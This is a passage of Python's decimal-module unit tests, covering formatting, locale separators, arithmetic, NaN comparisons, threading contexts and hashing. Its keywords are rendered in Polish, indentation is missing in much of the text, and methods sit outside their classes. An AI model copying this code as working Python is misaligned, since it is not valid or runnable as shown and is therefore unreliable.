('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
dla fmt, d, result w test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
# 'n' formatting with explicit localeconv-style override dictionaries;
# the C and Python implementations take the override differently.
Decimal = self.decimal.Decimal
spróbuj:
z locale zaimportuj CHAR_MAX
wyjąwszy ImportError:
self.skipTest('locale.CHAR_MAX nie available')
def make_grouping(lst):
zwróć ''.join([chr(x) dla x w lst]) jeżeli self.decimal == C inaczej lst
def get_fmt(x, override=Nic, fmt='n'):
jeżeli self.decimal == C:
zwróć Decimal(x).__format__(fmt, override)
inaczej:
zwróć Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
zaimportuj locale
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
jeżeli decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator'
'({!a} nie {!a})'.format(decimal_point, '\u066b'))
jeżeli thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator'
'({!a} nie {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
# Format tests against the C implementation.
klasa CFormatTest(FormatTest):
decimal = C
# Format tests against the pure-Python implementation.
klasa PyFormatTest(FormatTest):
decimal = P
klasa ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests dla all arithmetic operators, binary oraz unary.'''
# Addition: Decimal+Decimal, mixed int operands on both sides (result
# type must stay Decimal), and in-place +=.
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
# Subtraction: Decimal-Decimal, mixed int operands, and in-place -=.
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
# Multiplication: Decimal*Decimal, mixed int operands, and in-place *=.
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
    """True division for Decimal/Decimal and mixed Decimal/int operands."""
    Decimal = self.decimal.Decimal
    num = Decimal('-5')
    den = Decimal('2')

    # Decimal / Decimal, both operand orders.
    self.assertEqual(num / den, Decimal('-2.5'))
    self.assertEqual(den / num, Decimal('-0.4'))

    # int operand on the right: the result must still be a Decimal.
    quot = num / 4
    self.assertEqual(quot, Decimal('-1.25'))
    self.assertEqual(type(quot), type(num))

    # int operand on the left.
    quot = 4 / num
    self.assertEqual(quot, Decimal('-0.8'))
    self.assertEqual(type(quot), type(num))

    # Augmented assignment with a Decimal operand.
    num /= den
    self.assertEqual(num, Decimal('-2.5'))

    # Augmented assignment with an int operand.
    num /= 4
    self.assertEqual(num, Decimal('-0.625'))
def test_floor_division(self):
    """Floor division for Decimal/Decimal and mixed Decimal/int operands."""
    Decimal = self.decimal.Decimal
    num = Decimal('5')
    den = Decimal('2')

    # Decimal // Decimal, both operand orders.
    self.assertEqual(num // den, Decimal('2'))
    self.assertEqual(den // num, Decimal('0'))

    # int operand on the right: the result must still be a Decimal.
    quot = num // 4
    self.assertEqual(quot, Decimal('1'))
    self.assertEqual(type(quot), type(num))

    # int operand on the left.
    quot = 7 // num
    self.assertEqual(quot, Decimal('1'))
    self.assertEqual(type(quot), type(num))

    # Augmented assignment with a Decimal operand.
    num //= den
    self.assertEqual(num, Decimal('2'))

    # Augmented assignment with an int operand.
    num //= 2
    self.assertEqual(num, Decimal('1'))
def test_powering(self):
    """Exponentiation for Decimal/Decimal and mixed Decimal/int operands."""
    Decimal = self.decimal.Decimal
    base = Decimal('5')
    exponent = Decimal('2')

    # Decimal ** Decimal, both operand orders.
    self.assertEqual(base ** exponent, Decimal('25'))
    self.assertEqual(exponent ** base, Decimal('32'))

    # int operand on the right: the result must still be a Decimal.
    power = base ** 4
    self.assertEqual(power, Decimal('625'))
    self.assertEqual(type(power), type(base))

    # int operand on the left.
    power = 7 ** base
    self.assertEqual(power, Decimal('16807'))
    self.assertEqual(type(power), type(base))

    # Augmented assignment with a Decimal operand.
    base **= exponent
    self.assertEqual(base, Decimal('25'))

    # Augmented assignment with an int operand.
    base **= 4
    self.assertEqual(base, Decimal('390625'))
def test_module(self):
    """Modulo for Decimal/Decimal and mixed Decimal/int operands."""
    Decimal = self.decimal.Decimal
    num = Decimal('5')
    den = Decimal('2')

    # Decimal % Decimal, both operand orders.
    self.assertEqual(num % den, Decimal('1'))
    self.assertEqual(den % num, Decimal('2'))

    # int operand on the right: the result must still be a Decimal.
    rem = num % 4
    self.assertEqual(rem, Decimal('1'))
    self.assertEqual(type(rem), type(num))

    # int operand on the left.
    rem = 7 % num
    self.assertEqual(rem, Decimal('2'))
    self.assertEqual(type(rem), type(num))

    # Augmented assignment with a Decimal operand.
    num %= den
    self.assertEqual(num, Decimal('1'))

    # Augmented assignment with an int operand.
    num %= 4
    self.assertEqual(num, Decimal('1'))
def test_floor_div_module(self):
    """divmod() with Decimal/Decimal and mixed Decimal/int operands."""
    Decimal = self.decimal.Decimal
    dividend = Decimal('5')
    divisor = Decimal('2')

    # Decimal operands: quotient and remainder are both Decimals.
    quotient, remainder = divmod(dividend, divisor)
    self.assertEqual(quotient, Decimal('2'))
    self.assertEqual(remainder, Decimal('1'))
    self.assertEqual(type(quotient), type(dividend))
    self.assertEqual(type(remainder), type(dividend))

    # int divisor.
    quotient, remainder = divmod(dividend, 4)
    self.assertEqual(quotient, Decimal('1'))
    self.assertEqual(remainder, Decimal('1'))
    self.assertEqual(type(quotient), type(dividend))
    self.assertEqual(type(remainder), type(dividend))

    # int dividend.
    quotient, remainder = divmod(7, dividend)
    self.assertEqual(quotient, Decimal('1'))
    self.assertEqual(remainder, Decimal('2'))
    self.assertEqual(type(quotient), type(dividend))
    self.assertEqual(type(remainder), type(dividend))
def test_unary_operators(self):
    """Unary plus, unary minus and abs() on Decimal values."""
    Decimal = self.decimal.Decimal
    # +d, -d and abs(d) must agree with constructing from the signed int.
    self.assertEqual(+Decimal(45), Decimal(+45))
    self.assertEqual(-Decimal(45), Decimal(-45))
    self.assertEqual(abs(Decimal(45)), abs(Decimal(-45)))
def test_nan_comparisons(self):
    # comparisons involving signaling nans signal InvalidOperation

    # order comparisons (<, <=, >, >=) involving only quiet nans
    # also signal InvalidOperation

    # equality comparisons (==, !=) involving only quiet nans
    # don't signal, but return False or True respectively.
    Decimal = self.decimal.Decimal
    InvalidOperation = self.decimal.InvalidOperation
    localcontext = self.decimal.localcontext

    n = Decimal('NaN')
    s = Decimal('sNaN')
    i = Decimal('Inf')
    f = Decimal('2')

    qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
    snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
    order_ops = operator.lt, operator.le, operator.gt, operator.ge
    equality_ops = operator.eq, operator.ne

    # results when InvalidOperation is not trapped: every comparison with
    # a NaN is unequal, so only operator.ne yields True
    dla x, y w qnan_pairs + snan_pairs:
        dla op w order_ops + equality_ops:
            got = op(x, y)
            expected = Prawda jeżeli op jest operator.ne inaczej Nieprawda
            self.assertIs(expected, got,
                          "expected {0!r} dla operator.{1}({2!r}, {3!r}); "
                          "got {4!r}".format(
                              expected, op.__name__, x, y, got))

    # repeat the above, but this time trap the InvalidOperation
    przy localcontext() jako ctx:
        ctx.traps[InvalidOperation] = 1

        # equality on quiet NaNs never signals, even with the trap set
        dla x, y w qnan_pairs:
            dla op w equality_ops:
                got = op(x, y)
                expected = Prawda jeżeli op jest operator.ne inaczej Nieprawda
                self.assertIs(expected, got,
                              "expected {0!r} dla "
                              "operator.{1}({2!r}, {3!r}); "
                              "got {4!r}".format(
                                  expected, op.__name__, x, y, got))

        # any comparison touching a signaling NaN raises once trapped
        dla x, y w snan_pairs:
            dla op w equality_ops:
                self.assertRaises(InvalidOperation, operator.eq, x, y)
                self.assertRaises(InvalidOperation, operator.ne, x, y)

        # order comparisons raise for quiet and signaling NaNs alike
        dla x, y w qnan_pairs + snan_pairs:
            dla op w order_ops:
                self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
    """copy_sign accepts an int sign source but rejects a str."""
    Decimal = self.decimal.Decimal

    expected = Decimal(1).copy_sign(Decimal(-2))
    self.assertEqual(Decimal(1).copy_sign(-2), expected)
    self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
klasa CArithmeticOperatorsTest(ArithmeticOperatorsTest):
    # Run the operator suite against the C implementation (_decimal).
    decimal = C
klasa PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
    # Run the operator suite against the pure-Python implementation.
    decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
    # Worker 1 for ThreadingTest.test_threading: checks that context flags
    # set in this thread (and in nested localcontext blocks) stay isolated
    # from the other thread.  `cls` is the running TestCase instance.
    Decimal = cls.decimal.Decimal
    InvalidOperation = cls.decimal.InvalidOperation
    DivisionByZero = cls.decimal.DivisionByZero
    Overflow = cls.decimal.Overflow
    Underflow = cls.decimal.Underflow
    Inexact = cls.decimal.Inexact
    getcontext = cls.decimal.getcontext
    localcontext = cls.decimal.localcontext

    d1 = Decimal(1)
    d3 = Decimal(3)
    test1 = d1/d3

    # Hand control to thfunc2, which changes the other thread's precision;
    # wait until it is done before computing test2 here.
    cls.finish1.set()
    cls.synchro.wait()

    test2 = d1/d3
    przy localcontext() jako c2:
        cls.assertPrawda(c2.flags[Inexact])
        cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
        cls.assertPrawda(c2.flags[DivisionByZero])
        przy localcontext() jako c3:
            # nested context inherits the flags already set on c2
            cls.assertPrawda(c3.flags[Inexact])
            cls.assertPrawda(c3.flags[DivisionByZero])
            cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
            cls.assertPrawda(c3.flags[InvalidOperation])
            usuń c3
        # flags raised in the nested context must not leak back into c2
        cls.assertNieprawda(c2.flags[InvalidOperation])
        usuń c2

    # thfunc2's prec=18 change must not have affected this thread (prec 24)
    cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
    cls.assertEqual(test2, Decimal('0.333333333333333333333333'))

    c1 = getcontext()
    cls.assertPrawda(c1.flags[Inexact])
    dla sig w Overflow, Underflow, DivisionByZero, InvalidOperation:
        cls.assertNieprawda(c1.flags[sig])
def thfunc2(cls):
    # Worker 2 for ThreadingTest.test_threading: lowers this thread's
    # precision and checks flag/trap isolation from the other thread.
    # `cls` is the running TestCase instance.
    Decimal = cls.decimal.Decimal
    InvalidOperation = cls.decimal.InvalidOperation
    DivisionByZero = cls.decimal.DivisionByZero
    Overflow = cls.decimal.Overflow
    Underflow = cls.decimal.Underflow
    Inexact = cls.decimal.Inexact
    getcontext = cls.decimal.getcontext
    localcontext = cls.decimal.localcontext

    d1 = Decimal(1)
    d3 = Decimal(3)
    test1 = d1/d3

    # Shrink this thread's precision only; thfunc1 must stay at prec 24.
    thiscontext = getcontext()
    thiscontext.prec = 18
    test2 = d1/d3

    przy localcontext() jako c2:
        cls.assertPrawda(c2.flags[Inexact])
        cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
        cls.assertPrawda(c2.flags[Overflow])
        przy localcontext(thiscontext) jako c3:
            # c3 is a copy of thiscontext, so Overflow from c2 is absent
            cls.assertPrawda(c3.flags[Inexact])
            cls.assertNieprawda(c3.flags[Overflow])
            c3.traps[Underflow] = Prawda
            cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
            cls.assertPrawda(c3.flags[Underflow])
            usuń c3
        # neither the Underflow flag nor the trap may leak back into c2
        cls.assertNieprawda(c2.flags[Underflow])
        cls.assertNieprawda(c2.traps[Underflow])
        usuń c2

    # Let thfunc1 proceed and signal our own completion.
    cls.synchro.set()
    cls.finish2.set()

    # test1 used the original 24-digit precision, test2 the reduced 18.
    cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
    cls.assertEqual(test2, Decimal('0.333333333333333333'))

    cls.assertNieprawda(thiscontext.traps[Underflow])
    cls.assertPrawda(thiscontext.flags[Inexact])
    dla sig w Overflow, Underflow, DivisionByZero, InvalidOperation:
        cls.assertNieprawda(thiscontext.flags[sig])
klasa ThreadingTest(unittest.TestCase):
    '''Unit tests for thread local contexts in Decimal.'''

    # Take care executing this test from IDLE, there's an issue in threading
    # that hangs IDLE and I couldn't find it

    def test_threading(self):
        DefaultContext = self.decimal.DefaultContext

        jeżeli self.decimal == C oraz nie self.decimal.HAVE_THREADS:
            self.skipTest("compiled without threading")
        # Test the "threading isolation" of a Context. Also test changing
        # the DefaultContext, which acts as a template for the thread-local
        # contexts.
        save_prec = DefaultContext.prec
        save_emax = DefaultContext.Emax
        save_emin = DefaultContext.Emin
        DefaultContext.prec = 24
        DefaultContext.Emax = 425000000
        DefaultContext.Emin = -425000000

        # Events used to interleave thfunc1 and thfunc2 deterministically.
        self.synchro = threading.Event()
        self.finish1 = threading.Event()
        self.finish2 = threading.Event()

        th1 = threading.Thread(target=thfunc1, args=(self,))
        th2 = threading.Thread(target=thfunc2, args=(self,))

        th1.start()
        th2.start()

        self.finish1.wait()
        self.finish2.wait()

        # The template context itself must come out of the test clean.
        dla sig w Signals[self.decimal]:
            self.assertNieprawda(DefaultContext.flags[sig])

        # Restore the shared DefaultContext for later tests.
        DefaultContext.prec = save_prec
        DefaultContext.Emax = save_emax
        DefaultContext.Emin = save_emin
@unittest.skipUnless(threading, 'threading required')
klasa CThreadingTest(ThreadingTest):
    # Run the threading suite against the C implementation (_decimal).
    decimal = C
@unittest.skipUnless(threading, 'threading required')
klasa PyThreadingTest(ThreadingTest):
    # Run the threading suite against the pure-Python implementation.
    decimal = P
klasa UsabilityTest(unittest.TestCase):
    '''Unit tests for Usability cases of Decimal.'''

    def test_comparison_operators(self):
        # Rich comparisons between Decimals, with ints, and with
        # uncomparable objects; also checks that Decimals sort correctly.
        Decimal = self.decimal.Decimal

        da = Decimal('23.42')
        db = Decimal('23.42')
        dc = Decimal('45')

        # two Decimals
        self.assertGreater(dc, da)
        self.assertGreaterEqual(dc, da)
        self.assertLess(da, dc)
        self.assertLessEqual(da, dc)
        self.assertEqual(da, db)
        self.assertNotEqual(da, dc)
        self.assertLessEqual(da, db)
        self.assertGreaterEqual(da, db)

        # a Decimal and an int
        self.assertGreater(dc, 23)
        self.assertLess(23, dc)
        self.assertEqual(dc, 45)

        # a Decimal and uncomparable objects: only != holds
        self.assertNotEqual(da, 'ugly')
        self.assertNotEqual(da, 32.7)
        self.assertNotEqual(da, object())
        self.assertNotEqual(da, object)

        # sortable: shuffling then sorting restores numeric order
        a = list(map(Decimal, range(100)))
        b = a[:]
        random.shuffle(a)
        a.sort()
        self.assertEqual(a, b)
def test_decimal_float_comparison(self):
    """Ordering and equality between Decimal and float operands."""
    Decimal = self.decimal.Decimal
    quarter = Decimal('0.25')
    three = Decimal('3.0')

    # Decimal on the left-hand side.
    self.assertLess(quarter, 3.0)
    self.assertLessEqual(quarter, 3.0)
    self.assertGreater(three, 0.25)
    self.assertGreaterEqual(three, 0.25)
    self.assertNotEqual(quarter, 1.5)
    self.assertEqual(quarter, 0.25)

    # float on the left-hand side.
    self.assertGreater(3.0, quarter)
    self.assertGreaterEqual(3.0, quarter)
    self.assertLess(0.25, three)
    self.assertLessEqual(0.25, three)
    self.assertNotEqual(0.25, three)
    self.assertEqual(3.0, three)

    # 0.1 is not exactly representable in binary, so it must not
    # compare equal to Decimal('0.1').
    self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
    """Equality with complex works for zero imaginary part; ordering
    against complex is unsupported and must return NotImplemented."""
    Decimal = self.decimal.Decimal
    da = Decimal('0.25')
    db = Decimal('3.0')

    # Equality / inequality, both operand orders.
    self.assertNotEqual(da, (1.5+0j))
    self.assertNotEqual((1.5+0j), da)
    self.assertEqual(da, (0.25+0j))
    self.assertEqual((0.25+0j), da)
    self.assertEqual((3.0+0j), db)
    self.assertEqual(db, (3.0+0j))

    self.assertNotEqual(db, (3.0+1j))
    self.assertNotEqual((3.0+1j), db)

    # All four order comparisons must refuse complex operands.
    self.assertIs(db.__lt__(3.0+0j), NotImplemented)
    self.assertIs(db.__le__(3.0+0j), NotImplemented)
    self.assertIs(db.__gt__(3.0+0j), NotImplemented)
    # Bug fix: this line previously repeated __le__, leaving __ge__
    # untested.
    self.assertIs(db.__ge__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
    # Mixed Decimal/Fraction comparisons, including values near the
    # extreme exponent limits of the active implementation.
    D = self.decimal.Decimal
    F = fractions[self.decimal].Fraction
    Context = self.decimal.Context
    localcontext = self.decimal.localcontext
    InvalidOperation = self.decimal.InvalidOperation

    # Use the C module's real limits when available, otherwise the
    # pure-Python defaults.
    emax = C.MAX_EMAX jeżeli C inaczej 999999999
    emin = C.MIN_EMIN jeżeli C inaczej -999999999
    etiny = C.MIN_ETINY jeżeli C inaczej -1999999997
    c = Context(Emax=emax, Emin=emin)

    przy localcontext(c):
        c.prec = emax
        self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
        self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
        self.assertLess(F(0,1), D("1e" + str(etiny)))
        self.assertLess(D("-1e" + str(etiny)), F(0,1))
        self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
        self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))

        self.assertEqual(D("0.1"), F(1,10))
        self.assertEqual(F(1,10), D("0.1"))

        c.prec = 300
        # 1/3 cannot be exact in 300 digits, so it differs from F(1,3)
        self.assertNotEqual(D(1)/3, F(1,3))
        self.assertNotEqual(F(1,3), D(1)/3)

        self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
        self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))

        self.assertGreater(D('inf'), F(99999999999,123))
        self.assertGreater(D('inf'), F(-99999999999,123))
        self.assertLess(D('-inf'), F(99999999999,123))
        self.assertLess(D('-inf'), F(-99999999999,123))

        # NaN ordering signals from the Decimal side; the Fraction side
        # just returns NotImplemented.
        self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
        self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
        self.assertNotEqual(D('nan'), F(-9,123))
        self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
    """copy.copy and copy.deepcopy return the identical immutable object."""
    Decimal = self.decimal.Decimal
    original = Decimal('43.24')

    shallow = copy.copy(original)
    self.assertEqual(id(shallow), id(original))

    deep = copy.deepcopy(original)
    self.assertEqual(id(deep), id(original))
def test_hash_method(self):
    # hash(Decimal) must agree with __hash__, with hash(int) for integral
    # values, with hash(float) for exactly representable values, and must
    # be independent of the current context's precision.
    Decimal = self.decimal.Decimal
    localcontext = self.decimal.localcontext

    def hashit(d):
        # hash() and the dunder must agree; return the value for reuse.
        a = hash(d)
        b = d.__hash__()
        self.assertEqual(a, b)
        zwróć a

    # just that it's hashable
    hashit(Decimal(23))
    hashit(Decimal('Infinity'))
    hashit(Decimal('-Infinity'))
    hashit(Decimal('nan123'))
    hashit(Decimal('-NaN'))

    test_values = [Decimal(sign*(2**m + n))
                   dla m w [0, 14, 15, 16, 17, 30, 31,
                            32, 33, 61, 62, 63, 64, 65, 66]
                   dla n w range(-10, 10)
                   dla sign w [-1, 1]]
    test_values.extend([
            Decimal("-1"), # ==> -2
            Decimal("-0"), # zeros
            Decimal("0.00"),
            Decimal("-0.000"),
            Decimal("0E10"),
            Decimal("-0E12"),
            Decimal("10.0"), # negative exponent
            Decimal("-23.00000"),
            Decimal("1230E100"), # positive exponent
            Decimal("-4.5678E50"),
            # a value for which hash(n) != hash(n % (2**64-1))
            # in Python pre-2.6
            Decimal(2**64 + 2**32 - 1),
            # selection of values which fail with the old (before
            # version 2.6) long.__hash__
            Decimal("1.634E100"),
            Decimal("90.697E100"),
            Decimal("188.83E100"),
            Decimal("1652.9E100"),
            Decimal("56531E100"),
            ])

    # check that hash(d) == hash(int(d)) for integral values
    dla value w test_values:
        self.assertEqual(hashit(value), hashit(int(value)))

    # the same hash as an int
    self.assertEqual(hashit(Decimal(23)), hashit(23))
    # signaling NaNs are unhashable
    self.assertRaises(TypeError, hash, Decimal('sNaN'))
    self.assertPrawda(hashit(Decimal('Inf')))
    self.assertPrawda(hashit(Decimal('-Inf')))

    # check that the hashes of a Decimal float match when they
    # represent exactly the same values
    test_strings = ['inf', '-Inf', '0.0', '-.0e1',
                    '34.0', '2.5', '112390.625', '-0.515625']
    dla s w test_strings:
        f = float(s)
        d = Decimal(s)
        self.assertEqual(hashit(f), hashit(d))

    przy localcontext() jako c:
        # check that the value of the hash doesn't depend on the
        # current context (issue #1757)
        x = Decimal("123456789.1")

        c.prec = 6
        h1 = hashit(x)
        c.prec = 10
        h2 = hashit(x)
        c.prec = 16
        h3 = hashit(x)

        self.assertEqual(h1, h2)
        self.assertEqual(h1, h3)

        c.prec = 10000
        x = 1100 ** 1248
        self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
    """Built-in min()/max() compare by value and return the winning operand."""
    Decimal = self.decimal.Decimal
    small = Decimal('15.32')
    large = Decimal('28.5')
    small_int = 15
    large_int = 28

    # Decimal vs Decimal: identity of the returned operand matters.
    self.assertIs(min(small, large), small)
    self.assertIs(min(large, small), small)
    self.assertIs(max(small, large), large)
    self.assertIs(max(large, small), large)

    # Decimal vs int: the Decimal is returned when it is the extreme.
